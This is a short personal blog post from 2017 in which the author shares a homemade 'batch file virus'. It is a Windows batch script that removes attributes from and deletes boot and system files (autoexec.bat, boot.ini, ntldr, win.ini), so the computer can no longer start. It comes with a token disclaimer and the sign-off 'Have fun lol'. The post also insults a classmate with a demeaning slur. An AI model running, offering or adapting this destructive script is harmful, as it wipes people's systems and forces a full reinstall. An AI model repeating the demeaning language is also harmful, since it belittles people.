Sunday, 12 November 2017

Batch file virus

Introduction


Hey guys haven't posted in a while I have been doing a lot of school work, and there some retarded chick in my class that annoys that crap out me. 

Background

Um I have been working on this for a while and a finally got to virus rating from MacAffe. yay XDXDXDXD


The code

its a batch file that wipes that start-up files of a computer, so don’t be a noob ad test it out on your own computer coz it'll screw your computer up and the only way to fix it is to re-image your computer fully (wipe the hard drive and re-install windows again LOL)



Code:
-----Disclaimer - Not to be used to damage/harm other people’s computer systems----------

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


D
Have fun lol

No comments:

Post a Comment